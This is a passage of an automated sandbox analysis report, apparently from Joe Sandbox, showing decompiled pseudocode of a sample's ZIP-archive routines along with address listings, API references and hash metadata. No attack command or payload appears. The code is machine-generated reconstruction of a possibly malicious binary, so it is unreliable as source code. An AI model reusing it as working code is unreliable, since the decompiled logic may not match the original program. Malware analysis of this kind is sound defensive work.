															_t217 = memcpy(_v568 + 8, _t337, _t292 << 2);
															_t328 = _t337 + _t292 + _t292;
															 *(_v568 + 0x134) = _t217;
															goto L7;
														} else {
															_v586 = 0;
															while(1) {
																_t340 = _v572;
																_v588 =  *((intOrPtr*)(_t313 + _t340));
																_v587 =  *((intOrPtr*)(_t340 + _t313 + 1));
																_push(3);
																__eflags = 0;
																asm("repe cmpsb");
																if(0 == 0) {
																	break;
																}
																_t119 = ( *(_t313 + _v572 + 2) & 0x000000ff) + 4; // 0x4
																_t250 = _t313 + _t119;
																_v584.dwHighDateTime = _t250;
																__eflags = _t250 + 4 - _v576;
																if(_t250 + 4 < _v576) {
																	_t313 = _v584.dwHighDateTime;
																	continue;
																}
																goto L61;
															}
															_t342 = _v572;
															_t222 =  *(_t313 + _t342 + 4) & 0x000000ff;
															_v561 = _t222 >> 0x00000001 & 0x00000001;
															_t313 = _t313 + 5;
															_v562 = _t222 >> 0x00000002 & 0x00000001;
															__eflags = _t222 & 0x00000001;
															if((_t222 & 0x00000001) != 0) {
																_t307 = _t313 + _t342;
																_t327 = _t313 + 4;
																__eflags = ((((_t313 + _t342)[3] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[2] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[1] & 0x000000ff) << 0x00000008 |  *_t307 & 0x000000ff;
																_v584.dwHighDateTime = _t327;
																_t247 = E004049F0(((((_t313 + _t342)[3] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[2] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[1] & 0x000000ff) << 0x00000008 |  *_t307 & 0x000000ff, _t327);
																 *(_t262 + 0x120) = _t327;
																_t313 = _v584.dwHighDateTime;
																 *(_t262 + 0x11c) = _t247;
															}
															__eflags = _v561;
															if(_v561 != 0) {
																_t305 = _t313 + _t342;
																_t326 = _t313 + 4;
																__eflags = ((((_t313 + _t342)[3] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[2] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[1] & 0x000000ff) << 0x00000008 |  *_t305 & 0x000000ff;
																_v584.dwHighDateTime = _t326;
																_t239 = E004049F0(((((_t313 + _t342)[3] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[2] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[1] & 0x000000ff) << 0x00000008 |  *_t305 & 0x000000ff, _t326);
																 *(_t262 + 0x110) = _t326;
																_t313 = _v584.dwHighDateTime;
																 *(_t262 + 0x10c) = _t239;
															}
															__eflags = _v562;
															if(_v562 != 0) {
																_t303 = _t313 + _v572;
																_t313 = _t303[1] & 0x000000ff;
																__eflags = (((_t303[3] & 0x000000ff) << 0x00000008 | _t303[2] & 0x000000ff) << 0x00000008 | _t313) << 0x00000008 |  *_t303 & 0x000000ff;
																 *(_t262 + 0x114) = E004049F0((((_t303[3] & 0x000000ff) << 0x00000008 | _t303[2] & 0x000000ff) << 0x00000008 | _t313) << 0x00000008 |  *_t303 & 0x000000ff, _t313);
																 *(_t262 + 0x118) = _t313;
															}
															goto L61;
														}
													}
													__eflags = _t191 - 7;
													if(_t191 == 7) {
														goto L38;
													}
													__eflags = _t191 - 0xb;
													if(_t191 == 0xb) {
														goto L38;
													}
													__eflags = _t191 - 0xe;
													if(_t191 != 0xe) {
														goto L39;
													}
													goto L38;
												}
												goto L33;
											}
											goto L28;
										}
									}
									_push(_v572);
									E0041E5C2();
								}
								_t165 = 0x800;
								goto L65;
							}
							_t165 = 0x700;
							goto L65;
						} else {
							do {
								E0040706A( *_t337);
								_t255 =  *_v568;
								_t337 = _v568;
								__eflags =  *((intOrPtr*)(_t255 + 0x10)) - _a4;
							} while ( *((intOrPtr*)(_t255 + 0x10)) < _a4);
							goto L14;
						}
					}
					goto L9;
				} else {
					if(_t164 == 0xffffffff) {
						L9:
						 *_t262 =  *( *_t337 + 4);
						 *((char*)(_t262 + 4)) = 0;
						 *(_t262 + 0x108) = 0;
						 *(_t262 + 0x10c) = 0;
						 *(_t262 + 0x110) = 0;
						 *(_t262 + 0x114) = 0;
						 *(_t262 + 0x118) = 0;
						 *(_t262 + 0x11c) = 0;
						 *(_t262 + 0x120) = 0;
						 *((intOrPtr*)(_t262 + 0x124)) = 0;
						 *((intOrPtr*)(_t262 + 0x128)) = 0;
						L7:
						_t165 = 0;
						goto L65;
					}
					_t337 = _t337 + 8;
					_t311 = 0x4b;
					memcpy(_t262, _t337, _t311 << 2);
					_t328 = _t337 + _t311 + _t311;
					goto L7;
				}
			}
































































                                                                    0x0040781a
                                                                    0x0040781a
                                                                    0x00407823
                                                                    0x0040782a
                                                                    0x0040782d
                                                                    0x00407831
                                                                    0x00407834
                                                                    0x0040783d
                                                                    0x00407dbc
                                                                    0x00407dbc
                                                                    0x00407dc1
                                                                    0x00407dce
                                                                    0x00407dce
                                                                    0x00407843
                                                                    0x00407848
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407852
                                                                    0x00407854
                                                                    0x00407859
                                                                    0x00407859
                                                                    0x0040785c
                                                                    0x00407866
                                                                    0x0040787e
                                                                    0x00407881
                                                                    0x004078c8
                                                                    0x004078ca
                                                                    0x004078cd
                                                                    0x004078d1
                                                                    0x004078d6
                                                                    0x004078dc
                                                                    0x004078dc
                                                                    0x004078df
                                                                    0x004078e1
                                                                    0x004078e4
                                                                    0x00407903
                                                                    0x00407903
                                                                    0x0040791b
                                                                    0x0040793a
                                                                    0x00407942
                                                                    0x00407944
                                                                    0x00407952
                                                                    0x00407958
                                                                    0x0040795a
                                                                    0x00407961
                                                                    0x00407963
                                                                    0x00407975
                                                                    0x00407989
                                                                    0x0040798e
                                                                    0x00407994
                                                                    0x0040799c
                                                                    0x004079a2
                                                                    0x004079bd
                                                                    0x004079bf
                                                                    0x004079bf
                                                                    0x004079c1
                                                                    0x004079c1
                                                                    0x004079c8
                                                                    0x004079cf
                                                                    0x004079d0
                                                                    0x004079d0
                                                                    0x004079d4
                                                                    0x004079da
                                                                    0x004079da
                                                                    0x004079dc
                                                                    0x004079de
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004079e0
                                                                    0x004079e0
                                                                    0x004079e4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004079e6
                                                                    0x004079da
                                                                    0x004079da
                                                                    0x004079dc
                                                                    0x004079de
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004079de
                                                                    0x004079eb
                                                                    0x004079eb
                                                                    0x004079ed
                                                                    0x004079f3
                                                                    0x004079f3
                                                                    0x004079da
                                                                    0x004079da
                                                                    0x004079dc
                                                                    0x004079de
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004079de
                                                                    0x00000000
                                                                    0x004079da
                                                                    0x004079ef
                                                                    0x004079f1
                                                                    0x004079fc
                                                                    0x00407a03
                                                                    0x00407a05
                                                                    0x00407a3a
                                                                    0x00407a3a
                                                                    0x00407a3a
                                                                    0x00000000
                                                                    0x00407a3a
                                                                    0x00407a0d
                                                                    0x00407a14
                                                                    0x00407a16
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a1e
                                                                    0x00407a25
                                                                    0x00407a27
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a2f
                                                                    0x00407a36
                                                                    0x00407a38
                                                                    0x00407a45
                                                                    0x00407a4a
                                                                    0x00407a5c
                                                                    0x00407a6a
                                                                    0x00407a70
                                                                    0x00407a73
                                                                    0x00407a7a
                                                                    0x00407a81
                                                                    0x00407a88
                                                                    0x00407a8a
                                                                    0x00407a9b
                                                                    0x00407aa1
                                                                    0x00407aae
                                                                    0x00407ac0
                                                                    0x00407ac3
                                                                    0x00407ac3
                                                                    0x00407ac6
                                                                    0x00407acc
                                                                    0x00407ad2
                                                                    0x00407ad2
                                                                    0x00407ad9
                                                                    0x00407ae0
                                                                    0x00407ae2
                                                                    0x00407ae2
                                                                    0x00407aec
                                                                    0x00407af3
                                                                    0x00407af5
                                                                    0x00407af5
                                                                    0x00407af5
                                                                    0x00407af5
                                                                    0x00407afc
                                                                    0x00407b03
                                                                    0x00407b05
                                                                    0x00407b05
                                                                    0x00407b05
                                                                    0x00407b05
                                                                    0x00407b0c
                                                                    0x00407b0e
                                                                    0x00407b10
                                                                    0x00407b10
                                                                    0x00407b10
                                                                    0x00407b10
                                                                    0x00407b17
                                                                    0x00407b1e
                                                                    0x00407b20
                                                                    0x00407b20
                                                                    0x00407b20
                                                                    0x00407b20
                                                                    0x00407b2d
                                                                    0x00407b39
                                                                    0x00407b3f
                                                                    0x00407b47
                                                                    0x00407b59
                                                                    0x00407b65
                                                                    0x00407b73
                                                                    0x00407b81
                                                                    0x00407b8a
                                                                    0x00407bab
                                                                    0x00407bb2
                                                                    0x00407bb9
                                                                    0x00407bc5
                                                                    0x00407bd1
                                                                    0x00407be5
                                                                    0x00407beb
                                                                    0x00407bf1
                                                                    0x00407bf7
                                                                    0x00407bf9
                                                                    0x00407c00
                                                                    0x00407c06
                                                                    0x00407c0c
                                                                    0x00407c12
                                                                    0x00407c18
                                                                    0x00407c1e
                                                                    0x00407c24
                                                                    0x00407d83
                                                                    0x00407d83
                                                                    0x00407d8a
                                                                    0x00407d8c
                                                                    0x00407d92
                                                                    0x00407d97
                                                                    0x00407da6
                                                                    0x00407da7
                                                                    0x00407da9
                                                                    0x00407da9
                                                                    0x00407db1
                                                                    0x00000000
                                                                    0x00407c2a
                                                                    0x00407c2a
                                                                    0x00407c38
                                                                    0x00407c38
                                                                    0x00407c41
                                                                    0x00407c4b
                                                                    0x00407c51
                                                                    0x00407c5f
                                                                    0x00407c61
                                                                    0x00407c63
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407c70
                                                                    0x00407c70
                                                                    0x00407c74
                                                                    0x00407c7d
                                                                    0x00407c83
                                                                    0x00407c32
                                                                    0x00000000
                                                                    0x00407c32
                                                                    0x00000000
                                                                    0x00407c85
                                                                    0x00407c8a
                                                                    0x00407c90
                                                                    0x00407c9c
                                                                    0x00407caa
                                                                    0x00407cad
                                                                    0x00407cb3
                                                                    0x00407cb5
                                                                    0x00407cb7
                                                                    0x00407cd6
                                                                    0x00407cd9
                                                                    0x00407cdb
                                                                    0x00407ce1
                                                                    0x00407ce6
                                                                    0x00407cec
                                                                    0x00407cf2
                                                                    0x00407cf2
                                                                    0x00407cf8
                                                                    0x00407cff
                                                                    0x00407d01
                                                                    0x00407d20
                                                                    0x00407d23
                                                                    0x00407d25
                                                                    0x00407d2b
                                                                    0x00407d30
                                                                    0x00407d36
                                                                    0x00407d3c
                                                                    0x00407d3c
                                                                    0x00407d42
                                                                    0x00407d49
                                                                    0x00407d51
                                                                    0x00407d61
                                                                    0x00407d70
                                                                    0x00407d77
                                                                    0x00407d7d
                                                                    0x00407d7d
                                                                    0x00000000
                                                                    0x00407d49
                                                                    0x00407c24
                                                                    0x00407a8c
                                                                    0x00407a8f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a91
                                                                    0x00407a94
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a96
                                                                    0x00407a99
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a99
                                                                    0x00000000
                                                                    0x00407a38
                                                                    0x00000000
                                                                    0x004079f1
                                                                    0x004079da
                                                                    0x004079a4
                                                                    0x004079aa
                                                                    0x004079af
                                                                    0x00407965
                                                                    0x00000000
                                                                    0x00407965
                                                                    0x00407946
                                                                    0x00000000
                                                                    0x004078e6
                                                                    0x004078e6
                                                                    0x004078e8
                                                                    0x004078f3
                                                                    0x004078f8
                                                                    0x004078fe
                                                                    0x004078fe
                                                                    0x00000000
                                                                    0x004078e6
                                                                    0x004078e4
                                                                    0x00000000
                                                                    0x00407868
                                                                    0x0040786b
                                                                    0x00407883
                                                                    0x00407888
                                                                    0x0040788c
                                                                    0x00407890
                                                                    0x00407896
                                                                    0x0040789c
                                                                    0x004078a2
                                                                    0x004078a8
                                                                    0x004078ae
                                                                    0x004078b4
                                                                    0x004078ba
                                                                    0x004078c0
                                                                    0x00407877
                                                                    0x00407877
                                                                    0x00000000
                                                                    0x00407877
                                                                    0x0040786f
                                                                    0x00407872
                                                                    0x00407875
                                                                    0x00407875
                                                                    0x00000000
                                                                    0x00407875

                                                                    APIs
                                                                      • Part of subcall function 004069C3: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,00406B79), ref: 004069EF
                                                                    • __fassign.LIBCMT ref: 00407A45
                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407BB9
                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00407BE5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileTime$LocalPointerSystem__fassign
                                                                    • String ID: $/../$/..\$\../$\..\
                                                                    • API String ID: 3768451866-3209527955
                                                                    • Opcode ID: df8644b29a54a3a5d05e555ff76b3b4d9f9a9ba968dbc30f1fc888c12a42ab35
                                                                    • Instruction ID: b54f6115b32606d987e95d6d0f6a79dacc0784b1bcc0f9f6c932516286150cc1
                                                                    • Opcode Fuzzy Hash: df8644b29a54a3a5d05e555ff76b3b4d9f9a9ba968dbc30f1fc888c12a42ab35
                                                                    • Instruction Fuzzy Hash: 6CF19271D082548BDB24DF28C8897D97BB0AF59304F1445FAE849AB382D739AE81CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041C6DE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 441COMMONCrypto
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 96%
                                                                    			E0041C6DE(signed int __ecx, signed int __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v32;
				char _v42;
				char _v44;
				char _v45;
				char _v56;
				char _v320;
				signed int _v324;
				signed int _v328;
				char _v336;
				char _v596;
				char _v856;
				signed int _v860;
				char* _v864;
				char* _v868;
				signed int _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				short _v1140;
				short _v1142;
				short _v1144;
				signed int _v1148;
				intOrPtr _v1152;
				intOrPtr _v1156;
				char _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				unsigned int _v1176;
				void* _v1178;
				signed int _v1180;
				short _v1182;
				char _v1184;
				signed int _v1185;
				char _v1186;
				signed int _v1192;
				void* _v1196;
				signed int _v1200;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t223;
				intOrPtr* _t225;
				char* _t228;
				intOrPtr _t229;
				intOrPtr* _t230;
				short _t234;
				signed int _t236;
				signed int _t238;
				signed int _t247;
				signed int _t250;
				signed int _t253;
				signed int _t255;
				signed char _t263;
				char _t264;
				intOrPtr _t267;
				signed int _t269;
				void* _t273;
				void* _t274;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t283;
				signed int _t288;
				signed int _t294;
				signed int _t297;
				signed int _t298;
				intOrPtr* _t299;
				void* _t300;
				void* _t301;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t331;
				signed int _t332;
				signed int* _t337;
				signed int _t340;
				void* _t343;
				signed int _t355;
				void* _t358;
				signed int _t362;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t369;
				void* _t370;
				signed char* _t371;
				intOrPtr _t373;
				signed int _t379;

				_t341 = __edx;
				_t223 =  *0x443674; // 0x393162b1
				_v12 = _t223 ^ _t379;
				_t225 = _a4;
				_t301 = __edx;
				_t363 = 0;
				_v1192 = __ecx;
				if( *((intOrPtr*)(__edx + 0x14)) == 0) {
					__eflags =  *((char*)(__edx + 0x2c));
					if( *((char*)(__edx + 0x2c)) == 0) {
						_v1200 = 0;
						__eflags =  *__edx;
						if( *__edx != 0) {
							__eflags = _a12 - 4;
							if(_a12 != 4) {
								_v1200 = 0xc;
							}
						}
						_t341 =  &_v320 - _t225;
						__eflags = _t341;
						do {
							_t303 =  *_t225;
							 *((char*)(_t341 + _t225)) = _t303;
							_t225 = _t225 + 1;
							__eflags = _t303;
						} while (_t303 != 0);
						__eflags = _v320 - _t303;
						if(_v320 == _t303) {
							L99:
							_t226 = 0x10000;
							goto L100;
						}
						_t228 =  &_v320;
						do {
							__eflags =  *_t228 - 0x5c;
							if( *_t228 == 0x5c) {
								 *_t228 = 0x2f;
							}
							_t228 = _t228 + 1;
							__eflags =  *_t228;
						} while ( *_t228 != 0);
						__eflags = _a12 - 4;
						_v1185 = _a12 == 4;
						__eflags = _v1185;
						if(_v1185 == 0) {
							L18:
							_v1186 = 0;
							L19:
							__eflags = _v1185;
							_v1196 = 8;
							if(_v1185 != 0) {
								L21:
								_v1196 = _t363;
								L22:
								_t229 = _a12;
								__eflags = _t229 - 2;
								if(_t229 != 2) {
									__eflags = _t229 - 1;
									if(_t229 != 1) {
										__eflags = _t229 - 3;
										if(_t229 != 3) {
											__eflags = _t229 - 4;
											if(__eflags != 0) {
												goto L99;
											}
											_t226 = E0041C401(_t301, _t341, __eflags);
											L30:
											__eflags = _t226;
											if(_t226 != 0) {
												goto L100;
											}
											_t32 =  &_v324;
											 *_t32 = _v324 & _t226;
											__eflags =  *_t32;
											_v1128 = _t226;
											do {
												_t306 =  *((intOrPtr*)(_t379 + _t226 - 0x13c));
												 *((char*)(_t379 + _t226 - 0x354)) = _t306;
												_t226 = _t226 + 1;
												__eflags = _t306;
											} while (_t306 != 0);
											_t230 =  &_v856;
											_t343 = _t230 + 1;
											do {
												_t307 =  *_t230;
												_t230 = _t230 + 1;
												__eflags = _t307;
											} while (_t307 != 0);
											_v1160 = _t230 - _t343;
											__eflags = _v1186 - _t307;
											if(_v1186 == _t307) {
												L39:
												_v1142 = 0;
												_v1184 = 0xb17;
												_t234 = 0x14;
												_v1182 = _t234;
												_v1176 =  *((intOrPtr*)(_t301 + 0x68));
												_t236 = 8;
												_v596 = 0;
												_v860 = 0;
												_v1148 = 0;
												_v336 = 1;
												_v328 = 0;
												_v1172 = 0;
												_v1180 = _t236;
												_t308 = 9;
												__eflags =  *_t301;
												if( *_t301 != 0) {
													__eflags = _v1185;
													if(_v1185 == 0) {
														_v1180 = _t308;
													}
												}
												_v1140 = _v1180;
												_t238 = _v1196;
												_v1178 = _t238;
												__eflags = _t238;
												if(_t238 != 0) {
													L45:
													_v1168 = 0;
													goto L46;
												} else {
													_t294 =  *(_t301 + 0x70);
													__eflags = _t294;
													if(_t294 < 0) {
														goto L45;
													}
													_v1168 = _t294 + _v1200;
													L46:
													_v1164 =  *(_t301 + 0x70);
													_t364 =  *(_t301 + 0x58);
													_v1144 = 0;
													_v1136 =  *((intOrPtr*)(_t301 + 0x4c));
													_v1152 = _t308;
													_v1132 =  *(_t301 + 0x18) +  *((intOrPtr*)(_t301 + 0x10));
													_v868 =  &_v32;
													_v864 =  &_v44;
													_v27 =  *(_t301 + 0x58);
													_t247 =  *(_t301 + 0x5c);
													_v26 = (_t247 << 0x00000020 | _t364) >> 8;
													_v25 = (_t247 << 0x00000020 | _t364) >> 0x10;
													_t365 =  *(_t301 + 0x50);
													_v24 = (_t247 << 0x00000020 | _t364) >> 0x18;
													_v23 =  *(_t301 + 0x50);
													_t250 =  *(_t301 + 0x54);
													_v22 = (_t250 << 0x00000020 | _t365) >> 8;
													_v21 = (_t250 << 0x00000020 | _t365) >> 0x10;
													_t366 =  *(_t301 + 0x60);
													_v20 = (_t250 << 0x00000020 | _t365) >> 0x18;
													_v19 =  *(_t301 + 0x60);
													_t253 =  *(_t301 + 0x64);
													_v18 = (_t253 << 0x00000020 | _t366) >> 8;
													_t355 = _t253;
													_v17 = (_t355 << 0x00000020 | _t366) >> 0x10;
													_v32 = 0xd5455;
													_v28 = 7;
													_v16 = (_t253 << 0x00000020 | _t366) >> 0x18;
													asm("movsd");
													asm("movsd");
													asm("movsb");
													_t356 = _t301;
													_v1156 = 0x11;
													_t341 = _t355 >> 0x10;
													_v42 = 5;
													_t255 = E0041B274(_t301, (_t253 << 0x00000020 | _t366) >> 0x18, _t301,  &_v1184);
													__eflags = _t255;
													if(_t255 == 0) {
														 *(_t301 + 0x18) =  *(_t301 + 0x18) + _v1156 + _v1160 + 0x1e;
														__eflags =  *(_t301 + 0x14);
														if( *(_t301 + 0x14) == 0) {
															_t369 =  *_t301;
															_t328 = _t301 + 0x30;
															 *((intOrPtr*)(_t301 + 0x30)) = 0x12345678;
															 *((intOrPtr*)(_t301 + 0x34)) = 0x23456789;
															 *((intOrPtr*)(_t301 + 0x38)) = 0x34567890;
															__eflags = _t369;
															if(_t369 == 0) {
																L54:
																__eflags =  *0x446718;
																if( *0x446718 == 0) {
																	_t288 = GetDesktopWindow();
																	__eflags = _t288 ^ GetTickCount();
																	E0041FD60(_t288 ^ GetTickCount());
																}
																_t370 = 0;
																__eflags = 0;
																do {
																	 *((char*)(_t379 + _t370 - 0x34)) = E0041FD72(__eflags) >> 7;
																	_t370 = _t370 + 1;
																	__eflags = _t370 - 0xc;
																} while (__eflags < 0);
																_v45 = _v1176 >> 8;
																_t358 = 0;
																__eflags = 0;
																do {
																	_t371 = _t379 + _t358 - 0x34;
																	_t263 = E0041BC56(_t301 + 0x30, __eflags,  *_t371 & 0x000000ff);
																	_t358 = _t358 + 1;
																	_pop(_t330);
																	 *_t371 = _t263;
																	__eflags = _t358 - 0xc;
																} while (__eflags < 0);
																__eflags =  *_t301;
																if( *_t301 != 0) {
																	__eflags = _v1185;
																	if(_v1185 == 0) {
																		_t330 = _t301;
																		E0041C02B(_t301,  &_v56, 0xc);
																		_t166 = _t301 + 0x18;
																		 *_t166 =  *(_t301 + 0x18) + 0xc;
																		__eflags =  *_t166;
																	}
																}
																_v1192 = 0;
																__eflags =  *_t301;
																if( *_t301 == 0) {
																	L66:
																	_t264 = 0;
																	__eflags = 0;
																	goto L67;
																} else {
																	__eflags = _v1185;
																	if(_v1185 != 0) {
																		goto L66;
																	}
																	_t264 = 1;
																	L67:
																	__eflags = _v1185;
																	_t356 = _v1196;
																	 *((char*)(_t301 + 0x2d)) = _t264;
																	if(_v1185 != 0) {
																		 *(_t301 + 0x90) = 0;
																		L74:
																		_t363 = _t301;
																		 *((char*)(_t301 + 0x2d)) = 0;
																		E0041C540(_t301);
																		_t331 =  *(_t301 + 0x90);
																		_t226 =  *(_t301 + 0x14);
																		 *(_t301 + 0x18) =  *(_t301 + 0x18) + _t331;
																		__eflags = _t226;
																		if(_t226 != 0) {
																			goto L100;
																		}
																		__eflags = _v1192 - _t226;
																		if(_v1192 != _t226) {
																			L48:
																			_t226 = 0x400;
																			goto L100;
																		}
																		_t341 =  *(_t301 + 0x78);
																		_t267 = _v1200 + _t331;
																		__eflags = _v1168 - _t267;
																		_v1168 = _t267;
																		_t332 = _t331 & 0xffffff00 | _v1168 == _t267;
																		__eflags =  *((char*)(_t301 + 0x1c));
																		_v1172 =  *(_t301 + 0x78);
																		_v1164 =  *(_t301 + 0x70);
																		if( *((char*)(_t301 + 0x1c)) == 0) {
																			L86:
																			__eflags = _v1178 - _t356;
																			if(_v1178 == _t356) {
																				__eflags = _t356;
																				if(_t356 != 0) {
																					L90:
																					_t356 = _t301;
																					_t363 =  &_v1184;
																					_t269 = E0041B4D6(_t332, _t301,  &_v1184);
																					__eflags = _t269;
																					if(_t269 != 0) {
																						goto L48;
																					}
																					_t208 = _t301 + 0x18;
																					 *_t208 =  *(_t301 + 0x18) + 0x10;
																					__eflags =  *_t208;
																					_v1180 = _v1140;
																					L92:
																					_t226 =  *(_t301 + 0x14);
																					__eflags =  *(_t301 + 0x14);
																					if(__eflags != 0) {
																						goto L100;
																					}
																					_t373 = E0041E24D(_t301, _t341, _t356, _t363, __eflags, _v1152);
																					E00420090(_t373, _v864, _v1152);
																					_v864 = _t373;
																					_t273 = E0041E24D(_t301, _t341, _t356, _t373, __eflags, 0x360);
																					_t363 =  &_v1184;
																					_t274 = memcpy(_t273, _t363, 0xd8 << 2);
																					_t356 = _t363 + 0x1b0;
																					_t341 =  *(_t301 + 0x44);
																					__eflags = _t341;
																					if(_t341 != 0) {
																						while(1) {
																							_t220 = _t341 + 0x35c; // 0x360
																							_t337 = _t220;
																							__eflags =  *_t337;
																							if( *_t337 == 0) {
																								break;
																							}
																							_t341 =  *_t337;
																						}
																						 *(_t341 + 0x35c) = _t274;
																						L98:
																						_t226 = 0;
																						goto L100;
																					}
																					 *(_t301 + 0x44) = _t274;
																					goto L98;
																				}
																				__eflags = _t332;
																				if(_t332 == 0) {
																					goto L87;
																				}
																				goto L90;
																			}
																			L87:
																			_t226 = 0x4000000;
																			goto L100;
																		}
																		__eflags =  *_t301;
																		if( *_t301 == 0) {
																			L79:
																			__eflags = _v1180 & 0x00000001;
																			_v1178 = _t356;
																			if((_v1180 & 0x00000001) == 0) {
																				_t197 =  &_v1180;
																				 *_t197 = _v1180 & 0x0000fff7;
																				__eflags =  *_t197;
																			}
																			_t363 = _v1132 -  *((intOrPtr*)(_t301 + 0x10));
																			_v1140 = _v1180;
																			_t277 = E0041C0F8(_t301, _v1132 -  *((intOrPtr*)(_t301 + 0x10)));
																			__eflags = _t277;
																			if(_t277 != 0) {
																				_t356 = _t301;
																				_t363 =  &_v1184;
																				_t278 = E0041B274(_t301, _t332, _t301,  &_v1184);
																				__eflags = _t278;
																				if(_t278 != 0) {
																					goto L48;
																				}
																				_t363 =  *(_t301 + 0x18);
																				_t280 = E0041C0F8(_t301,  *(_t301 + 0x18));
																				__eflags = _t280;
																				if(_t280 != 0) {
																					goto L92;
																				}
																				goto L82;
																			} else {
																				L82:
																				_t226 = 0x2000000;
																				goto L100;
																			}
																		}
																		__eflags = _v1185;
																		if(_v1185 == 0) {
																			goto L86;
																		}
																		goto L79;
																	}
																	__eflags = _t356 - 8;
																	if(_t356 != 8) {
																		__eflags = _t356;
																		if(__eflags != 0) {
																			goto L74;
																		}
																		_t283 = E0041C686(_t301, _t330, __eflags);
																		L72:
																		_v1192 = _t283;
																		goto L74;
																	}
																	_t283 = E0041C581(_t301,  &_v1184);
																	goto L72;
																}
															} else {
																goto L52;
															}
															while(1) {
																L52:
																_t341 =  *_t369;
																__eflags =  *_t369;
																if( *_t369 == 0) {
																	goto L54;
																}
																E0041BC10(_t328);
																_t369 = _t369 + 1;
																__eflags = _t369;
																if(_t369 != 0) {
																	continue;
																}
																goto L54;
															}
															goto L54;
														}
														_t363 = _t301;
														E0041C540(_t301);
														_t226 =  *(_t301 + 0x14);
														goto L100;
													}
													_t363 = _t301;
													E0041C540(_t301);
													goto L48;
												}
											}
											_t362 =  &_v856 - 1;
											__eflags = _t362;
											do {
												_t297 =  *(_t362 + 1);
												_t362 = _t362 + 1;
												__eflags = _t297;
											} while (_t297 != 0);
											asm("movsw");
											_t45 =  &_v1160;
											 *_t45 = _v1160 + 1;
											__eflags =  *_t45;
											goto L39;
										}
										_t341 = _v1192;
										_t226 = E0041C33E(_t301, _a8, _v1192);
										goto L30;
									}
									_t226 = E0041C21B(_t301, _v1192, _a8);
									goto L30;
								}
								_t363 = _t301;
								_t226 = E0041C1A0(_t301, _v1192);
								goto L30;
							}
							_t356 =  &_v320;
							_t298 = E0041BC80( &_v320);
							__eflags = _t298;
							if(_t298 == 0) {
								goto L22;
							}
							goto L21;
						}
						_t299 =  &_v320;
						_t341 = _t299 + 1;
						do {
							_t340 =  *_t299;
							_t299 = _t299 + 1;
							__eflags = _t340;
						} while (_t340 != 0);
						_t300 = _t299 - _t341;
						__eflags =  *((char*)(_t379 + _t300 - 0x13d)) - 0x2f;
						_v1186 = 1;
						if( *((char*)(_t379 + _t300 - 0x13d)) != 0x2f) {
							goto L19;
						}
						goto L18;
					} else {
						_t226 = 0x50000;
						goto L100;
					}
				} else {
					_t226 = 0x40000;
					L100:
					return E0041DA9B(_t226, _t301, _v12 ^ _t379, _t341, _t356, _t363);
				}
			}










































































































                                                                    0x0041c6de
                                                                    0x0041c6e7
                                                                    0x0041c6ee
                                                                    0x0041c6f1
                                                                    0x0041c6f6
                                                                    0x0041c6f8
                                                                    0x0041c6fb
                                                                    0x0041c704
                                                                    0x0041c710
                                                                    0x0041c714
                                                                    0x0041c720
                                                                    0x0041c726
                                                                    0x0041c728
                                                                    0x0041c72a
                                                                    0x0041c72e
                                                                    0x0041c730
                                                                    0x0041c730
                                                                    0x0041c72e
                                                                    0x0041c740
                                                                    0x0041c740
                                                                    0x0041c742
                                                                    0x0041c742
                                                                    0x0041c744
                                                                    0x0041c747
                                                                    0x0041c748
                                                                    0x0041c748
                                                                    0x0041c74c
                                                                    0x0041c752
                                                                    0x0041ccfe
                                                                    0x0041ccfe
                                                                    0x00000000
                                                                    0x0041ccfe
                                                                    0x0041c758
                                                                    0x0041c75e
                                                                    0x0041c75e
                                                                    0x0041c761
                                                                    0x0041c763
                                                                    0x0041c763
                                                                    0x0041c766
                                                                    0x0041c767
                                                                    0x0041c767
                                                                    0x0041c76c
                                                                    0x0041c770
                                                                    0x0041c777
                                                                    0x0041c77e
                                                                    0x0041c7a3
                                                                    0x0041c7a3
                                                                    0x0041c7aa
                                                                    0x0041c7aa
                                                                    0x0041c7b1
                                                                    0x0041c7bb
                                                                    0x0041c7cc
                                                                    0x0041c7cc
                                                                    0x0041c7d2
                                                                    0x0041c7d2
                                                                    0x0041c7d5
                                                                    0x0041c7d8
